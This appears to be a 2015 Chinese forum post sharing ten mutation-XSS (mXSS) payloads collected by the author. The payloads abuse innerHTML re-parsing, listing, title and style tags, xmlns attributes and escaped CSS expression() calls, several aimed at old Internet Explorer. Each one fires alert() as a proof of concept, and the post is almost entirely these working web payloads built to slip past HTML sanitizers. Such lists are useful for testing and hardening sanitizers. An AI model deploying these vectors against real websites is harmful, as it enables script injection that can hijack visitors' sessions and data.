一些 mXSS Vector

随随意意 (233) | 2015-06-09 23:17

收集了蛮多的,扔10条出来,我好想当一条渗透狗远离XSS

<listing>&ltimg src=x onerror=alert(1)&gt</listing>

<img src="test.jpg" alt ="``onload=alert(2)" />

<script>

x="<%";

</script>

<div title="%&gt;&lt;/script&gt;&quot;&lt;img src=1 onerror=alert(3)&gt;"></div>

<style/>&lt;/style&gt;&lt;img src=1 onerror=alert(4)&gt;</style>

<listing id=x>&lt;img src=1 onerror=alert(5)&gt;</listing>

<script>alert(document.getElementById('x').innerHTML)</script>

<title>&lt;img src=1 onerror=alert(6)&gt;</title> div.innerHTML = document.getElementsByTagName("title")[0]; // IE8, already-known?

<pkav xmlns="urn:img src=1 onerror=alert(7)//">123

<pkav xmlns="><iframe onload=alert(8)">123</pkav>

<p style="font-family:'ar\27 \3bx\3a expression\28alert\28 9\29\29\3bial';"></p>

<p style="font-family:'ar&#x5c;27 \3bx\3a ex\5cpre\2f**\2fssion\28 alert\28 10\29\29\3bial';"></p>